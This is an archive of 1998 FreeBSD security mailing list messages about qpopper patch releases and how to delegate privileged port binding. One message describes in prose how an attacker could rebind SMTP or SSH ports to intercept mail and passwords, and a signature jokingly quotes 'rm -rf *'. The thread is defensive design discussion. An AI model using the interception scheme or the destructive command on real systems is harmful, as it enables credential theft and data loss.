perms, so that you can edit those whilst mount_portal is still running.
I thought I'd had a go at that, but I don't see the code anywhere just
now so I'll assume it's not going to be easily found.

Darren

http://coombs.anu.edu.au/~avalon/mount_portal.tgz

From owner-freebsd-security Wed Jul 1 15:35:24 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA05348 for freebsd-security-outgoing; Wed, 1 Jul 1998 15:35:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA05331 for ; Wed, 1 Jul 1998 15:35:19 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu)
Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id RAA03933 for security@freebsd.org; Wed, 1 Jul 1998 17:35:20 -0500 (CDT)
From: Igor Roshchin
Message-Id: <199807012235.RAA03933@alecto.physics.uiuc.edu>
Subject: Just FYI: QPOPPER-2.52
To: security@FreeBSD.ORG
Date: Wed, 1 Jul 1998 17:35:20 -0500 (CDT)
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've noticed that one more patch was changed on Jun 30, and the Makefile
for the newer version (2.5) was made available today.
Thanks for the quick job.

Just FYI: it's already 2.52 which is the current version.
I don't know what they've changed there from 2.51 to 2.52, but it was
announced that 2.51: "It fixes the bulletins bug and changes the licensing."

Sorry, probably it doesn't belong to this mailing list anymore...
IgoR

From owner-freebsd-security Wed Jul 1 20:14:19 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA18592 for freebsd-security-outgoing; Wed, 1 Jul 1998 20:14:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns2.sminter.com.ar (ns2.sminter.com.ar [200.10.100.11]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA18587 for ; Wed, 1 Jul 1998 20:14:15 -0700 (PDT) (envelope-from Recabarren!fpscha@ns2.sminter.com.ar)
Received: (from uucp@localhost) by ns2.sminter.com.ar (8.8.5/8.8.4) id AAA24794 for FreeBSD.ORG!freebsd-security; Thu, 2 Jul 1998 00:12:20 -0300 (GMT)
>Received: (from fpscha@localhost) by localhost.schapachnik.com.ar (8.8.5/8.8.5) id VAA00574; Wed, 1 Jul 1998 21:51:28 -0300 (ARST)
From: "Fernando P. Schapachnik"
Message-Id: <199807020051.VAA00574@localhost.schapachnik.com.ar>
Subject: Re: Remote exploit in qpopper.
To: insane@oneinsane.net (Ron 'The Insane One' Rosson)
Date: Wed, 1 Jul 1998 21:51:28 -0300 (ARST)
Cc: nicole@mediacity.com, freebsd-security@FreeBSD.ORG
In-Reply-To: <19980630174336.A25206@oneinsane.net> from Ron 'The Insane One' Rosson at "Jun 30, 98 05:43:36 pm"
Reply-To: fpscha@schapachnik.com.ar
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Please note that since yesterday version 2.51 is also available, which
fixes problems with bulletins. It is in the same directory as 2.5,
whichever it is (I downloaded both versions from the original location
posted to the list, only I can't remember it).

Regards!
In an earlier message Ron 'The Insane One' Rosson wrote:
>
> On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote:
> >
> > On 30-Jun-98 Jeremy Shaffner wrote:
> > >
> > > There is also a new version released today from Qualcomm. 2.5 is
> > > patched against all known problems.
> > > ftp://ftp.qualcomm.com/eudora/servers/popper/.
> >
> > I just tried to go there and the eudora directory doesn't exist. I also tried
> > their other recommended site. Anyone know of alternate sites?
> >
> > Nicole
>
> You are not losing your mind.. I just checked and I don't see it anywhere.
>
> Ron
> --
> Ron Rosson              ... and a UNIX user said ...
> The InSaNe One                 rm -rf *
> insane@oneinsane.net      and all was null and void
> It's so nice to be insane, nobody asks you to explain.

Fernando P. Schapachnik
fpscha@schapachnik.com.ar

From owner-freebsd-security Wed Jul 1 20:58:51 1998
From: Igor Roshchin
To: security@FreeBSD.ORG
Date: Wed, 1 Jul 1998 22:58:46 -0500 (CDT)
Subject: (FWD) Qpopper 2.52

Date: Wed, 1 Jul 1998 16:04:17 -0700
From: Laurence Lundblade
To: BUGTRAQ@NETSPACE.ORG
Subject: Qpopper 2.52 (was Re: qpopper 2.51)

Indeed things were moving around, though it wasn't quite a good thing. We had some trouble with our FTP server configuration. It has been resolved.

We also have a few new fixes to qpopper. The current version is qpopper2.52. It fixes a few problems with bulletins, and some compilation issues with strerror() on some UNIXs that occurred in 2.5. The official location is:

ftp://ftp.qualcomm.com/eudora/servers/unix/popper

Hopefully that puts an end to this issue. Sorry about the problems with the ftp server.

Also I'll mention that we're planning a qpopper 3.0 that will fix a few more bugs that we know about (not security holes, I assure you).
We have proposed a general POP extension mechanism that has passed last call with the IETF and is awaiting approval by the area director and the IESG and publication as an RFC. Qpopper 3.0 will support it.

LL

At 11:04 AM -0500 7/1/98, Aleph One wrote:
>Well, it seems Qualcomm was moving stuff around last night. There is a
>new version of qpopper out. It fixes the bulletins bug and changes the
>licensing.
>
>ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.51.tar.Z
>
>Aleph One / aleph1@dfw.net
>http://underground.org/
>KeyID 1024/948FD6B5
>Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Wed Jul 1 21:30:33 1998
From: Jamie Lawrence
To: fpscha@schapachnik.com.ar
Date: Wed, 01 Jul 1998 21:26:46 -0700
Subject: Re: Remote exploit in qpopper.
Cc: freebsd-security@FreeBSD.ORG

Please note that since today there is a version 2.52 available, which fix problem found by various Bugtraq subscribers.

My users are using an alternate mail delivery method until at least one day goes by without a new version which addresses security concerns being released. Ahem.

-j

At 09:51 PM 7/1/98 -0300, you wrote:
>Please note that since yesterday version 2.51 is also available, which
>fixes problems with bulletins. It is in the same directory as 2.5,
>whichever it is (I downloaded both versions from the original location
>posted to the list, only I can't remember it).
>
>Regards!
>
>In an earlier message Ron 'The Insane One' Rosson wrote:
>>
>> On Tue, Jun 30, 1998 at 01:15:38PM -0700, Nicole wrote:
>> >
>> > On 30-Jun-98 Jeremy Shaffner wrote:
>> > >
>> > > There is also a new version released today from Qualcomm. 2.5 is
>> > > patched against all known problems.
>> > > ftp://ftp.qualcomm.com/eudora/servers/popper/.
From owner-freebsd-security Wed Jul 1 22:11:19 1998
From: Mike
To: Igor Roshchin
Cc: security@FreeBSD.ORG
Date: Thu, 2 Jul 1998 01:14:01 -0400 (EDT)
Subject: Re: (FWD) Qpopper 2.52

On Wed, 1 Jul 1998, Igor Roshchin wrote:

[snip]
> The current version is qpopper2.52. It fixes a few problems with bulletins,
> and some compilation issues with strerror() on some UNIXs that occurred in
> 2.5.
[snip]

I'm running 2.5 right now... and will be awaiting 3.0. However, 2.52 seems to sig 11 like crazy here under 3.0-CURRENT. Maybe it's just me, I'll have to look at it again tomorrow when I'm a bit more 'awake'.
:)

-mike

From owner-freebsd-security Wed Jul 1 22:25:33 1998
From: Jamie Lawrence
To: freebsd-security@FreeBSD.ORG
Date: Wed, 01 Jul 1998 22:23:00 -0700
Subject: Off-Topic: Grammar Clarification (Was: Re: Remote exploit in qpopper.)

Please note that the verb agreement grammatical error evidenced below was an unfortunate typo; it was neither my intention to make that error, nor to mock the language skills of anyone. Any mockery coming from this keyboard is, in general, well meaning, I hope. WRT the message below, the sarcasm is directed at a software vendor. I was not intentionally picking on anyone else, in any way. Apologies to any and all who may have viewed my message as, um, linguist.

-j, going home before any more flames appear in my inbox.
At 09:26 PM 7/1/98 -0700, Jamie Lawrence wrote:
>
>Please note that since today there is a version 2.52 available, which
>fix problem found by various Bugtraq subscribers.
>
>My users are using an alternate mail delivery method until at least
>one day goes by without a new version which addresses security concerns
>being released. Ahem.
>
>-j
>
>At 09:51 PM 7/1/98 -0300, you wrote:
>>Please note that since yesterday version 2.51 is also available, which
>>fixes problems with bulletins. It is in the same directory as 2.5,
>>whichever it is (I downloaded both versions from the original location
>>posted to the list, only I can't remember it).
>>
>>Regards!

From owner-freebsd-security Wed Jul 1 22:29:32 1998
From: "Allen Smith"
To: Darren Reed
Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 01:26:21 -0400
Subject: Re: bsd securelevel patch question

On Jul 1, 11:34pm, Darren Reed (possibly) wrote:
> well, I dug it up, and it's not really pretty, but it does prove it is
> possible. the way I set it up to work was to read in the directory
> structure prior to mount_portal taking it over and then use the file
> perms in that for access control.
>
> this was just an experiment.
>
> a better way to do it is to have a separate configuration file for the
> perms. so that you can edit those whilst mount_portal is still running.
> I thought I'd had a go at that, but I don't see the code anywhere just
> now so I'll assume it's not going to be easily found.
>
> http://coombs.anu.edu.au/~avalon/mount_portal.tgz

I don't have any way of getting to that currently; could you put that on an ftp-accessible spot? There's no link to that from the http://coombs.anu.edu.au/~avalon/ page.

Does this require that programs access these ports via the portal filesystem itself, or is it simply determining permissions this way? If the former, then that's going to cause the same sort of problems with porting - including porting security-critical applications - that I was mentioning earlier. If the latter, that makes it more interesting... although probably still requiring some alterations to the group permissions system to make it work right with setuid programs, as I was pointing out previously.
-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu

From owner-freebsd-security Thu Jul 2 00:08:43 1998
From: "Allen Smith"
To: dg@root.com
Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 03:06:49 -0400
Subject: Re: bsd securelevel patch question

On Jul 1, 12:44am, David Greenman (possibly) wrote:
> I'll resist any scheme that ties specific privileges to specific gids. To
> me it seems too kludgy and I also suspect that most FreeBSD admins will be
> quite unhappy about us hijacking a large block of gids for our special
> purposes.

Umm... OK, you're the boss. The block of gids I'd had in mind was above 65535, so I have my doubts how many people would be using those. Any ideas on alternate routes for port permission broadening? I haven't been able to look at Darren's version so far.
-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu

From owner-freebsd-security Thu Jul 2 01:55:59 1998
From: David Greenman
To: "Allen Smith"
Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 02 Jul 1998 01:55:23 -0700
Subject: Re: bsd securelevel patch question

>On Jul 1, 12:44am, David Greenman (possibly) wrote:
>
>> I'll resist any scheme that ties specific privileges to specific gids. To
>> me it seems too kludgy and I also suspect that most FreeBSD admins will be
>> quite unhappy about us hijacking a large block of gids for our special
>> purposes.
>
>Umm... OK, you're the boss. The block of gids I'd had in mind was
>above 65535, so I have my doubts how many people would be using
>those. Any ideas on alternate routes for port permission broadening? I
>haven't been able to look at Darren's version so far.

Well, someone will have to convince me that delegating access on a port by port basis is necessary in the first place.
I'd personally be happy with a simple privilege that allows binding to ports <1024.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Thu Jul 2 02:56:14 1998
From: "Allen Smith"
To: dg@root.com
Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 05:54:16 -0400
Subject: Re: bsd securelevel patch question

On Jul 2, 1:55am, David Greenman (possibly) wrote:
> Well, someone will have to convince me that delegating access on a port
> by port basis is necessary in the first place. I'd personally be happy with
> a simple privilege that allows binding to ports <1024.

Daemon spoofing.
Let's say I've set up a web server that binds to port I want to reduce the risks from this, so I (under your scheme) give the server a privilege that enables it to bind (I'm assuming binding for reception of incoming stuff only, given rsh et al) to any TCP port below 1024. Cracker notices that I've made a goof in writing a cgi script (or the author of the webserver has goofed), and proceeds to crack it such that he can run any arbitrary program under that uid, with that privilege (this will be the case if it's run as a uid instead of setuid). Now, run a program via cron on a very frequent basis that tries binding to the smtp, ssh, or other significant port not run through inetd. This enables mail interception for smtp, password interception for ssh, etcetera. With the exception of a syslog'd error message from the smtp program, this won't be spotted in that case if the cracker then uses sendmail's -bs flag, or the equivalent for other mail programs. Ssh is admittedly going to get spotted pretty soon, but one interception of the root password (or an interception of a password a person uses across systems) is going to be enough to create problems.

There are probably other vulnerabilities that I haven't thought of; going off of the least privilege principle seems the best.
-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu

From owner-freebsd-security Thu Jul 2 03:38:59 1998
From: ark@eltex.ru
To: easmith@beatrice.rutgers.edu
Cc: avalon@coombs.anu.edu.au, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 14:31:43 GMT
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: bsd securelevel patch question

nuqneH,

Is there anything like that without involving portalfs, say, working on a per-user basis? ;)

CU in Hell
/Arkan#iD
Do I believe in the Bible? Hell, man, I've seen one!
From owner-freebsd-security Thu Jul 2 05:05:08 1998
From: Darren Reed
To: easmith@beatrice.rutgers.edu (Allen Smith)
Cc: avalon@coombs.anu.edu.au, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 22:04:26 +1000 (EST)
Subject: Re: bsd securelevel patch question

In some mail from Allen Smith, sie said:
>
> I don't have any way of getting to that currently; could you put that
> on an ftp-accessible spot? There's no link to that from the
> http://coombs.anu.edu.au/~avalon/ page.

ftp://coombs.anu.edu.au/pub/net/misc/mount_portal.tgz

> Does this require that programs access these ports via the portal
> filesystem itself, or is it simply determining permissions this way?
It requires them to use portals.

> If the former, then that's going to cause the same sort of problems
> with porting - including porting security-critical applications - that
> I was mentioning earlier. If the latter, that makes it more
> interesting... although probably still requiring some alterations to
> the group permissions system to make it work right with setuid
> programs, as I was pointing out previously.

Well, if compiled C code calls a socket(2) stub in libc, then that or the bind or connect could be written to transparently use portals. Otherwise you need to convert your socket/bind calls into an open. If one was using a more advanced API for sockets than the system calls, which did it all in one call, you'd just rewrite that part of the library.

In that implementation of adding access control to portals, there's too much fiddly work involved in making it work. A separate file or other statements in portal.conf could just as easily (and perhaps better) control access.

Darren

From owner-freebsd-security Thu Jul 2 07:05:35 1998
From: Niall Smart
To: "Allen Smith", dg@root.com
Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 14:31:18 +0000
Subject: Re: bsd securelevel patch question

On Jul 2, 5:54am, "Allen Smith" wrote:
} Subject: Re: bsd securelevel patch question
> On Jul 2, 1:55am, David Greenman (possibly) wrote:
> > Well, someone will have to convince me that delegating access on a port
> > by port basis is necessary in the first place. I'd personally be happy with
> > a simple privilege that allows binding to ports <1024.
>
> instead of setuid). Now, run a program via cron on a very frequent
> basis that tries binding to the smtp, ssh, or other significant port
> not run through inetd. This enables mail interception for smtp,
> password interception for ssh, etcetera. With the exception of a

Eh? If ssh/smtp/inetd bind to the port you won't be able to, no matter how often you try. And you won't be able to steal keys by hijacking sshd.

I still agree with you for other reasons though, if an attacker creates a new service people might use it even though it isn't a legitimate service set up by the sysadmin.

What's wrong with a /dev/socket/tcp/XYZ ACL type scheme? If the process has permission to read /dev/socket/tcp/83 then they can bind to port 83. You could make it a procfs type filesystem so all the ACL information was in memory for speed. Then you've got to save/restore state though.

Niall

--
Niall Smart.
PGP: finger njs3@motmot.doc.ic.ac.uk
FreeBSD: Turning PC's into Workstations: www.freebsd.org

From owner-freebsd-security Thu Jul 2 07:11:30 1998
From: David Greenman
To: rotel@indigo.ie
Cc: "Allen Smith", security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 02 Jul 1998 07:10:20 -0700
Subject: Re: bsd securelevel patch question

>Eh? If ssh/smtp/inetd bind to the port you won't be able to, no
>matter how often you try. And you won't be able to steal keys
>by hijacking sshd.
>
>I still agree with you for other reasons though, if an attacker
>creates a new service people might use it even though it isn't a
>legitimate service set up by the sysadmin.
>
>What's wrong with a /dev/socket/tcp/XYZ ACL type scheme? If the
>process has permission to read /dev/socket/tcp/83 then they can
>bind to port 83, you could make it a procfs type filesystem so all
>the ACL information was in memory for speed. Then you've got to
>save/restore state though.

Well, one thing that is wrong with this is that it is slow.
I sure wouldn't want my busy WWW server doing this for every connection that is made.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Thu Jul 2 08:31:49 1998
From: Niall Smart
To: dg@root.com, rotel@indigo.ie
Cc: "Allen Smith", security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 2 Jul 1998 16:26:16 +0000
Subject: Re: bsd securelevel patch question

On Jul 2, 7:10am, David Greenman wrote:
} Subject: Re: bsd securelevel patch question
>
> Well, one thing that is wrong with this is that it is slow. I sure wouldn't
> want my busy WWW server doing this for every connection that is made.

It would only be necessary to do this for binds to ports < 1024. So it would just be checked every time a daemon started.

Niall

--
Niall Smart.
PGP: finger njs3@motmot.doc.ic.ac.uk
FreeBSD: Turning PC's into Workstations: www.freebsd.org

From owner-freebsd-security Thu Jul 2 08:38:51 1998
From: Poul-Henning Kamp
To: rotel@indigo.ie
Cc: "Allen Smith", dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Date: Thu, 02 Jul 1998 17:35:48 +0200
Subject: Re: bsd securelevel patch question

>Eh? If ssh/smtp/inetd bind to the port you won't be able to, no
>matter how often you try. And you won't be able to steal keys
>by hijacking sshd.

Correct.

>I still agree with you for other reasons though, if an attacker
>creates a new service people might use it even though it isn't a
>legitimate service set up by the sysadmin.

Right, but if the attacker has hacked your system enough to bind to a socket < 1024, he >OWNS< it. Any further attempt at adding security is bogus, and can at best OPEN the window more because you will be adding more complexity, rather than subtract from it.
The one fix that gives you most mileage is to add kernel code such
that above some particular securelevel, you cannot open sockets < 1024
anymore. The downside is you have to reboot to restart daemons and the
R* family stops working...

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal


From owner-freebsd-security Thu Jul 2 09:02:24 1998
From: David Greenman
Reply-To: dg@root.com
Message-Id: <199807021600.JAA24882@implode.root.com>
To: rotel@indigo.ie
cc: "Allen Smith", security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Subject: Re: bsd securelevel patch question
In-reply-to: Your message of "Thu, 02 Jul 1998 16:26:16 -0000." <199807021526.QAA02205@indigo.ie>
Date: Thu, 02 Jul 1998 09:00:56 -0700

>On Jul 2, 7:10am, David Greenman wrote:
>} Subject: Re: bsd securelevel patch question
>>
>> Well, one thing that is wrong with this is that it is slow. I sure wouldn't
>> want my busy WWW server doing this for every connection that is made.
>
>It would only be necessary to do this for binds to ports < 1024. So it
>would just be checked every time a daemon started.

Um, well, let's talk about FTP servers, then, since those do a privileged
bind() for every data connection that is established (one per file
transfer).

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project


From owner-freebsd-security Thu Jul 2 09:05:21 1998
From: Niall Smart
Message-Id: <199807021556.QAA00294@indigo.ie>
Date: Thu, 2 Jul 1998 16:56:14 +0000
In-Reply-To: Poul-Henning Kamp "Re: bsd securelevel patch question" (Jul 2, 5:35pm)
To: Poul-Henning Kamp, rotel@indigo.ie
Subject: Re: bsd securelevel patch question
Cc: "Allen Smith", dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 2, 5:35pm, Poul-Henning Kamp wrote:
} Subject: Re: bsd securelevel patch question
>
> >I still agree with you for other reasons though, if an attacker
> >creates a new service people might use it even though it isn't a
> >legitimate service set up by the sysadmin.
>
> Right, but if the attacker has hacked your system enough to bind
> to a socket < 1024, he >OWNS< it.
> Any further attempt at adding
> security is bogus, and can at best OPEN the window more because
> you will be adding more complexity, rather than subtract from it.

That's not true, if he hacks the user/group that the web server runs
at then he only owns the web server, the only additional privilege
he gains is the ability to bind to port 80.

Niall

--
Niall Smart.
PGP: finger njs3@motmot.doc.ic.ac.uk
FreeBSD: Turning PC's into Workstations: www.freebsd.org


From owner-freebsd-security Thu Jul 2 09:23:23 1998
From: andrew@squiz.co.nz (Andrew McNaughton)
Date: Fri, 3 Jul 1998 04:26:00 +1200
To: security@FreeBSD.ORG
Subject: Re: bsd securelevel patch question

>Eh? If ssh/smtp/inetd bind to the port you won't be able to, no
>matter how often you try.

Unless the server is restarted for some reason. Hence the rapid cron job
which will eventually succeed if not detected first.

>And you won't be able to steal keys
>by hijacking sshd.

If the trojan gets to tell the other end what public key to use,
then of course it can get at the data stream. This is equally true
with routing/man-in-the-middle attacks.
Without access to master.passwd though it can't do a very good job of
masquerading as an authentication agent. It will fail to emulate any
authentication unless that can be done by accepting any connection
regardless. I don't know enough about the authentication systems ssh
uses to know which if any are vulnerable here.

>I still agree with you for other reasons though, if an attacker
>creates a new service people might use it even though it isn't a
>legitimate service set up by the sysadmin.
>
>What's wrong with a /dev/socket/tcp/XYZ acl type scheme? If the
>process has permission to read /dev/socket/tcp/83 then they can
>bind to port 83, you could make it a procfs type filesystem so all
>the ACL information was in memory for speed. Then you've got to
>save/restore state though.
>
>Niall

I don't know enough about TCP/IP details to know if this makes sense,
but perhaps you could use these as more than just flags and allow
programmers to bind to the socket by just opening the appropriate
device file.
ie

#!/usr/local/bin/perl
open (SMTP, "


From: Philippe Regnauld
Date: Thu, 2 Jul 1998 18:24:00 +0200
Message-ID: <19980702182400.33083@deepo.prosa.dk>
To: dg@root.com
Cc: security@FreeBSD.ORG
Subject: Re: bsd securelevel patch question
References: <199807021331.OAA00656@indigo.ie> <199807021410.HAA24585@implode.root.com>
In-Reply-To: <199807021410.HAA24585@implode.root.com>; from David Greenman on Thu, Jul 02, 1998 at 07:10:20AM -0700
Organization: PROSA

David Greenman writes:
>
> >What's wrong with a /dev/socket/tcp/XYZ acl type scheme? If the
> >process has permission to read /dev/socket/tcp/83 then they can
> >bind to port 83, you could make it a procfs type filesystem so all
>
> Well, one thing that is wrong with this is that it is slow. I sure wouldn't
> want my busy WWW server doing this for every connection that is made.

Wouldn't the parent apache (or other) bind to 80 and listen there once
and for all at startup time?

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead IN
and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle


From owner-freebsd-security Thu Jul 2 10:07:36 1998
From: Poul-Henning Kamp
To: rotel@indigo.ie
cc: "Allen Smith", dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Subject: Re: bsd securelevel patch question
In-reply-to: Your message of "Thu, 02 Jul 1998 16:56:14 -0000." <199807021556.QAA00294@indigo.ie>
Date: Thu, 02 Jul 1998 19:04:48 +0200
Message-ID: <2755.899399088@critter.freebsd.dk>

In message <199807021556.QAA00294@indigo.ie>, Niall Smart writes:
>On Jul 2, 5:35pm, Poul-Henning Kamp wrote:
>} Subject: Re: bsd securelevel patch question
>>
>> >I still agree with you for other reasons though, if an attacker
>> >creates a new service people might use it even though it isn't a
>> >legitimate service set up by the sysadmin.
>>
>> Right, but if the attacker has hacked your system enough to bind
>> to a socket < 1024, he >OWNS< it. Any further attempt at adding
>> security is bogus, and can at best OPEN the window more because
>> you will be adding more complexity, rather than subtract from it.
>
>That's not true, if he hacks the user/group that the web server runs
>at then he only owns the web server, the only additional privilege
>he gains is the ability to bind to port 80.

which is worse than the standard: he cannot bind to any port < 1024.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal


From owner-freebsd-security Thu Jul 2 10:31:48 1998
From: Niall Smart
Message-Id: <199807021723.SAA00883@indigo.ie>
Date: Thu, 2 Jul 1998 18:23:39 +0000
In-Reply-To: Poul-Henning Kamp "Re: bsd securelevel patch question" (Jul 2, 7:04pm)
To: Poul-Henning Kamp, rotel@indigo.ie
Subject: Re: bsd securelevel patch question
Cc: "Allen Smith", dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 2, 7:04pm, Poul-Henning Kamp wrote:
} Subject: Re: bsd securelevel patch question
>
> >That's not true, if he hacks the user/group that the web server runs
> >at then he only owns the web server, the only additional privilege
> >he gains is the ability to bind to port 80.
>
> which is worse than the standard: he cannot bind to any port < 1024.

Well, this depends on how the server runs, if it binds to the port
and then setuid()'s to a lower privilege then this is true. There
are clients out there that are purely setuid just so they can bind
to a port < 1024 however, so it has valid uses.

Niall

--
Niall Smart.
PGP: finger njs3@motmot.doc.ic.ac.uk
FreeBSD: Turning PC's into Workstations: www.freebsd.org


From owner-freebsd-security Thu Jul 2 10:52:35 1998
From: Darren Reed
Message-Id: <199807021752.KAA05020@hub.freebsd.org>
Subject: Re: bsd securelevel patch question
To: rotel@indigo.ie
Date: Fri, 3 Jul 1998 03:51:27 +1000 (EST)
Cc: easmith@beatrice.rutgers.edu, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
In-Reply-To: <199807021331.OAA00656@indigo.ie> from "Niall Smart" at Jul 2, 98 02:31:18 pm

In some mail from Niall Smart, sie said:
>
> What's wrong with a
> /dev/socket/tcp/XYZ acl type scheme? If the
> process has permission to read /dev/socket/tcp/83 then they can
> bind to port 83, you could make it a procfs type filesystem so all
> the ACL information was in memory for speed. Then you've got to
> save/restore state though.

you already have /dev/socket/tcp/XYZ using portals.

why reinvent that wheel again?

you (and others) seem very keen on doing this. maybe you should do
some more research about what's around now before taking this much
further.

darren


From owner-freebsd-security Fri Jul 3 02:03:42 1998
From: "Allen Smith"
Message-Id: <9807030501.ZM7814@beatrice.rutgers.edu>
Date: Fri, 3 Jul 1998 05:01:44 -0400
In-Reply-To: andrew@squiz.co.nz (Andrew McNaughton) "Re: bsd securelevel patch question" (Jul 3, 4:26am)
To: andrew@squiz.co.nz (Andrew McNaughton)
Cc: Allen Smith, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, phk@critter.freebsd.dk
Subject: Re: bsd securelevel patch question

On Jul 3, 4:26am, Andrew McNaughton (possibly) wrote:
> >Eh?
> >If ssh/smtp/inetd bind to the port you won't be able to, no
> >matter how often you try.
>
> Unless the server is restarted for some reason. Hence the rapid cron job
> which will eventually succeed if not detected first.

Quite; sorry I wasn't clearer, but I forgot that others might not
realize that. Notice, for instance, that named comes with a script for
such restarting - implying there's a frequent enough need for such that
it's likely to come up. (It's also the case that currently sendmail and
some other stuff gets started _after_ cron, but that can be taken care
of via rearranging the /etc/rc.* files.) Another example is squid,
which can be run as an http accelerator; it comes with a RunAccel
script that restarts squid whenever it crashes - and crashes could be
induced by an attacker.

> >And you won't be able to steal keys
> >by hijacking sshd.
>
> If the trojan gets to tell the other end what public key to use,
> then of course it can get at the data stream. This is equally true
> with routing/man-in-the-middle attacks. Without access to
> master.passwd though it can't do a very good job of masquerading as
> an authentication agent. It will fail to emulate any authentication
> unless that can be done by accepting any connection regardless. I
> don't know enough about the authentication systems ssh uses to know
> which if any are vulnerable here.

All it has to do to act as an authentication agent for password
sniffing purposes is use telnetd or login. One ssh mode is to
essentially act as an encrypted telnet, with normal password
authentication.
-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu


From owner-freebsd-security Fri Jul 3 02:30:02 1998
From: "Allen Smith"
Message-Id: <9807030526.ZM8133@beatrice.rutgers.edu>
Date: Fri, 3 Jul 1998 05:26:58 -0400
In-Reply-To: Darren Reed "Re: bsd securelevel patch question" (Jul 3, 3:51am)
References: <01IYXE91JSKI008EO4@AESOP.RUTGERS.EDU>
To: Darren Reed, rotel@indigo.ie
Subject: Re: bsd securelevel patch question
Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 3, 3:51am, Darren Reed (possibly) wrote:
> In some mail from Niall Smart, sie said:
> >
> > What's wrong with a /dev/socket/tcp/XYZ acl type scheme? If the
> > process has permission to read /dev/socket/tcp/83 then they can
> > bind to port 83, you could make it a procfs type filesystem so all
> > the ACL information was in memory for speed. Then you've got to
> > save/restore state though.
>
> you already have /dev/socket/tcp/XYZ using portals.
>
> why reinvent that wheel again?

There are three possible ways of doing things here:

A. as Niall appears to be suggesting, have programs using the current
   syscalls, library routines, etcetera to do sockets, with permissions
   being determined by files
B. use portals, with either editing programs to now use open or
   modifying the library, etcetera code to do this for them
C. use another permissions mechanism (privileges, possibly via groups)

A is a nice idea for configurability but is likely to be slow. B is
also nice for configurability, appears possibly to be less slow, but
will be rather headachy in either translating or library etc
modifications. C is the option I'm favoring.

